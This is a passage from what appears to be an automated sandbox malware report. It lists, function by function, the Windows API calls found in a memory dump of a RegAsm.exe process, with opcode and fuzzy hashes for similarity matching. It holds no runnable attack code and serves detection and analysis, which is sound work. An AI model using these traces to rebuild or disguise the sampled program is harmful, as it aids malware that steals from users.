                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileModuleName
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 514040917-0
                                                                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
